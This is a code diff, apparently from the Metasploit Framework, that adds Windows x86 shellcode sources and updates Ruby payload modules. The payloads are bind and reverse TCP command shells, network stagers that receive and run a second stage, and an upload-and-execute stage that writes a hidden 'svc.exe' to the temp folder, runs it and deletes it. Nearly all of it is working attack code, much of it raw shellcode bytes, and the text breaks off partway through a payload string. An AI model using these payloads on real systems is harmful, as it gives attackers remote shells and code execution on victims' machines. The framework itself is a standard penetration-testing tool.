;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 341 bytes
|
||||
; Build: >build.py single_shell_bind_tcp
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_bind_tcp.asm"
|
||||
; By here we will have performed the bind_tcp connection and EDI will be out socket.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
20
external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm
vendored
Normal file
20
external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm
vendored
Normal file
|
@ -0,0 +1,20 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 314 bytes
|
||||
; Build: >build.py single_shell_reverse_tcp
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_reverse_tcp.asm"
|
||||
; By here we will have performed the reverse_tcp connection and EDI will be out socket.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
|
@ -0,0 +1,22 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 240 bytes
|
||||
; Build: >build.py stage_shell
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
|
||||
; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
|
||||
; if the old stage 1 location gets munged.
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_shell.asm"
|
||||
; Perform the call to our EXITFUNC.
|
||||
%include "./src/block/block_exitfunk.asm"
|
|
@ -0,0 +1,137 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 398 bytes
|
||||
; Build: >build.py stage_upexec
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
|
||||
; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
|
||||
; if the old stage 1 location gets munged.
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
delta: ;
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
; create a file in a temp dir...
|
||||
push byte 127 ; Push down 127
|
||||
pop eax ; And pop it into EAX
|
||||
shl eax, 3 ; Shift EAX left by 3 so it = 1016
|
||||
sub esp, eax ; Alloc this space on the stack for the temp file path + name
|
||||
push esp ; Push the buffer address
|
||||
push eax ; Push the buffer size (127 * 4 = 508)
|
||||
push 0xE449F330 ; hash( "kernel32.dll", "GetTempPathA" )
|
||||
call ebp ; GetTempPathA( 1016, &buffer );
|
||||
lea eax, [esp+eax] ; EAX = pointer to the end of the temp path buffer (ESP point to the full path)
|
||||
mov dword [eax+0], 0x2E637673 ; Append the file name...
|
||||
mov dword [eax+4], 0x00657865 ; 'svc.exe',0
|
||||
; Create the file...
|
||||
mov eax, esp ; to save a few bytes, pace the file path pointer in EAX
|
||||
push eax ; save the pointer to the file path for later
|
||||
push byte 0 ; We dont specify a template file handle
|
||||
push byte 6 ; The Flags and Attributes: FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM
|
||||
push byte 2 ; The Creation Disposition: CREATE_ALWAYS
|
||||
push byte 0 ; We dont specify a SECURITY_ATTRIBUTES structure
|
||||
push byte 7 ; The Share Mode: FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE
|
||||
push 0xE0000000 ; The Desired Access: GENERIC_EXECUTE|GENERIC_READ|GENERIC_WRITE
|
||||
push eax ; The name of the file to create
|
||||
push 0x4FDAF6DA ; hash( "kernel32.dll", "CreateFileA" )
|
||||
call ebp ; CreateFileA( ... );
|
||||
mov ebx, eax ; EBX = the new file handle
|
||||
; Receive the size of the incoming file...
|
||||
push esp ; Alloc a dword for the recv buffer param
|
||||
mov esi, esp ; Save pointer
|
||||
push byte 0 ; Flags
|
||||
push byte 4 ; Length = sizeof( DWORD );
|
||||
push esi ; The 4 byte buffer on the stack to hold the second stage length
|
||||
push edi ; The saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, &dwLength, 4, 0 );
|
||||
; Alloc a RW buffer for the incoming file...
|
||||
mov esi, [esi] ; Dereference the pointer to the second stage length
|
||||
push byte 0x04 ; PAGE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
push esi ; Push the newly recieved second stage length.
|
||||
push byte 0 ; NULL as we dont care where the allocation is.
|
||||
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_READWRITE );
|
||||
push ebx ; Save the file handle for later call to CloseHandle
|
||||
; setup the parameters for subsequent call to WriteFile (saves us trying to preserve various registers)
|
||||
push ebx ; Alloc a dword for the bytes written param
|
||||
mov ecx, esp ; Save this address
|
||||
push byte 0 ; null as we dont set an overlapped param
|
||||
push ecx ; Pointer to the number of bytes written output param
|
||||
push esi ; Push the buffer length
|
||||
push eax ; Push the newly allocated RW buffer
|
||||
push ebx ; Push the hFile param
|
||||
mov ebx, eax ; EBX = our new memory address for the incoming file
|
||||
; read in the incoming file...
|
||||
read_more: ;
|
||||
push byte 0 ; Flags
|
||||
push esi ; Length
|
||||
push ebx ; The current address into our incoming files RW buffer
|
||||
push edi ; The saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, buffer, length, 0 );
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
sub esi, eax ; length -= bytes_received
|
||||
test esi, esi ; Test length
|
||||
jnz read_more ; Continue if we have more to read
|
||||
; write the entire files buffer to disk...
|
||||
push 0x5BAE572D ; hash( "kernel32.dll", "WriteFile" )
|
||||
call ebp ; WriteFile( hFile, pBuffer, len, &out, 0 );
|
||||
pop ecx ; Restore esp to the correct location for the next call
|
||||
; close the file handle, we dont need to push the handle as it is allready pushed onto stack
|
||||
push 0x528796C6 ; hash( "kernel32.dll", "CloseHandle" )
|
||||
call ebp ; CloseHandle( hFile );
|
||||
; execute the file...
|
||||
push edi ; Our socket becomes the processes hStdError
|
||||
push edi ; Our socket becomes the processes hStdOutput
|
||||
push edi ; Our socket becomes the processes hStdInput
|
||||
xor esi, esi ; Clear ESI for all the NULL's we need to push
|
||||
push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
|
||||
pop ecx ; Set ECX for the loop
|
||||
push_loop2: ;
|
||||
push esi ; Push a null dword
|
||||
loop push_loop2 ; Keep looping untill we have pushed enough nulls
|
||||
mov word [esp+60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
|
||||
lea eax, [esp+16] ; Set EAX as a pointer to our STARTUPINFO Structure
|
||||
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
|
||||
; perform the call to CreateProcessA
|
||||
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
|
||||
push eax ; Push the pointer to the STARTUPINFO Structure
|
||||
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
|
||||
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
|
||||
push esi ; We dont specify any dwCreationFlags
|
||||
inc esi ; Increment ESI to be one
|
||||
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
|
||||
dec esi ; Decrement ESI back down to zero
|
||||
push esi ; Set lpThreadAttributes to NULL
|
||||
push esi ; Set lpProcessAttributes to NULL
|
||||
push dword [esp+120] ; Set the lpCommandLine to run the file (Use the saved pointer to the file path)
|
||||
push esi ; Set lpApplicationName to NULL as we are using the command line param instead
|
||||
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
|
||||
call ebp ; CreateProcessA( 0, &file, 0, 0, TRUE, 0, 0, 0, &si, &pi );
|
||||
; perform the call to WaitForSingleObject
|
||||
mov eax, esp ; Save pointer to the PROCESS_INFORMATION Structure
|
||||
dec esi ; Decrement ESI down to -1 (INFINITE)
|
||||
push esi ; Push INFINITE inorder to wait forever
|
||||
inc esi ; Increment ESI back to zero
|
||||
push dword [eax] ; Push the handle from our PROCESS_INFORMATION.hProcess
|
||||
push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
|
||||
call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
|
||||
; close the socket...
|
||||
push edi ; Push the socket to close
|
||||
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
|
||||
call ebp ; closesocket( s );
|
||||
; delete the file...
|
||||
push dword [esp+88] ; Push the saved pointer to the file path
|
||||
push 0x13DD2ED7 ; hash( "kernel32.dll", "DeleteFileA" )
|
||||
call ebp ; DeleteFileA( &file );
|
||||
; finish up with the EXITFUNK
|
||||
%include "./src/block/block_exitfunk.asm"
|
|
@ -0,0 +1,19 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 301 bytes
|
||||
; Build: >build.py stager_bind_tcp_nx
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_bind_tcp.asm"
|
||||
; By here we will have performed the bind_tcp connection and EDI will be our socket.
|
||||
%include "./src/block/block_recv.asm"
|
||||
; By now we will have recieved in the second stage into a RWX buffer and be executing it
|
|
@ -0,0 +1,20 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 274 bytes
|
||||
; Build: >build.py stager_reverse_tcp_nx
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_reverse_tcp.asm"
|
||||
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
|
||||
%include "./src/block/block_recv.asm"
|
||||
; By now we will have recieved in the second stage into a RWX buffer and be executing it
|
|
@ -15,9 +15,9 @@ module Msf::Payload::Windows
|
|||
#
|
||||
@@exit_types =
|
||||
{
|
||||
'seh' => 0x5f048af0, # SetUnhandledExceptionFilter
|
||||
'thread' => 0x60e0ceef, # ExitThread
|
||||
'process' => 0x73e2d87e, # ExitProcess
|
||||
'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter
|
||||
'thread' => 0x0A2A1DE0, # ExitThread
|
||||
'process' => 0x56A2B5F0, # ExitProcess
|
||||
}
|
||||
|
||||
#
|
||||
|
@ -64,6 +64,13 @@ module Msf::Payload::Windows
|
|||
# ensure that the entire stage is read in.
|
||||
#
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
||||
if( self.module_info['Stager']['RequiresMidstager'] == false )
|
||||
conn.put( [ payload.length ].pack('V') )
|
||||
# returning false allows stager.rb!handle_connection() to prepend the stage_prefix if needed
|
||||
return false
|
||||
end
|
||||
|
||||
return false if (payload.length < 512)
|
||||
|
||||
# The mid-stage works by reading in a four byte length in host-byte
|
||||
|
|
|
@ -1,3 +1,7 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
|
@ -5,6 +9,7 @@ module Msf
|
|||
# Common command execution implementation for Windows.
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::Exec
|
||||
|
||||
include Msf::Payload::Windows
|
||||
|
@ -15,7 +20,7 @@ module Payload::Windows::Exec
|
|||
'Name' => 'Windows Execute Command',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Execute an arbitrary command',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -23,16 +28,20 @@ module Payload::Windows::Exec
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 100, 'V' ]
|
||||
'EXITFUNC' => [ 161, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" +
|
||||
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" +
|
||||
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64" +
|
||||
"\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83" +
|
||||
"\xc0\x6a\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x01\x8D\x85\xB9\x00\x00\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5" +
|
||||
"\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" +
|
||||
"\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
|
||||
|
|
|
@ -82,7 +82,7 @@ module Payload::Windows::ReflectiveDllInject
|
|||
"\x68\x04\x00\x00\x00" + # push 0x4 ; signal we have attached
|
||||
"\x50" + # push eax ; some value for hinstance
|
||||
"\xFF\xD0" + # call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
|
||||
"\x68\xDE\xC0\xAD\xDE" + # push 0xDEADC0DE ; our EXITFUNC placeholder
|
||||
"\x68\xE0\x1D\x2A\x0A" + # push 0x0A2A1DE0 ; our EXITFUNC placeholder (Default to ExitThread for migration)
|
||||
"\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached
|
||||
"\x50" + # push eax ; some value for hinstance
|
||||
"\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
|
||||
|
|
|
@ -24,7 +24,7 @@ module Metasploit3
|
|||
'Name' => 'Windows Command Shell, Bind TCP Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection and spawn a command shell',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -34,38 +34,31 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 162, 'n' ],
|
||||
'EXITFUNC' => [ 308, 'V' ],
|
||||
'LPORT' => [ 201, 'n' ],
|
||||
'EXITFUNC' => [ 311, 'V' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
|
||||
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
|
||||
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
|
||||
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
|
||||
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
|
||||
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
|
||||
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
|
||||
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
|
||||
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
|
||||
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53" +
|
||||
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1" +
|
||||
"\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51" +
|
||||
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" +
|
||||
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50" +
|
||||
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" +
|
||||
"\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d" +
|
||||
"\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
|
||||
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93" +
|
||||
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" +
|
||||
"\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01" +
|
||||
"\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" +
|
||||
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83" +
|
||||
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73" +
|
||||
"\x53\xff\xd6\xff\xd0"
|
||||
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
|
||||
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
|
||||
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
|
||||
"\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31" +
|
||||
"\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44" +
|
||||
"\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53" +
|
||||
"\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68" +
|
||||
"\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D" +
|
||||
"\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F" +
|
||||
"\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -77,5 +77,18 @@ module Metasploit3
|
|||
}
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
# for now we must let this payload use the old EXITFUNC hash values.
|
||||
def replace_var(raw, name, offset, pack)
|
||||
super
|
||||
if( name == 'EXITFUNC' )
|
||||
datastore[name] = 'thread' if not datastore[name]
|
||||
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
|
||||
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
|
||||
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
|
@ -24,7 +24,7 @@ module Metasploit3
|
|||
'Name' => 'Windows Command Shell, Reverse TCP Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Connect back to attacker and spawn a command shell',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -34,36 +34,30 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 166, 'n' ],
|
||||
'LHOST' => [ 160, 'ADDR' ],
|
||||
'EXITFUNC' => [ 278, 'V' ],
|
||||
'LPORT' => [ 203, 'n' ],
|
||||
'LHOST' => [ 196, 'ADDR' ],
|
||||
'EXITFUNC' => [ 284, 'V' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
|
||||
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
|
||||
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
|
||||
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
|
||||
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
|
||||
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
|
||||
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
|
||||
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
|
||||
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
|
||||
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43" +
|
||||
"\x53\xff\xd0\x68\xff\xff\xff\xff\x66\x68\x11\x5c" +
|
||||
"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff" +
|
||||
"\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" +
|
||||
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
|
||||
"\xe2\x31\xc0\xf3\xaa\x95\x89\xfd\xfe\x42\x2d\xfe" +
|
||||
"\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3" +
|
||||
"\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" +
|
||||
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
|
||||
"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7" +
|
||||
"\x79\xc6\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff" +
|
||||
"\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0"
|
||||
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
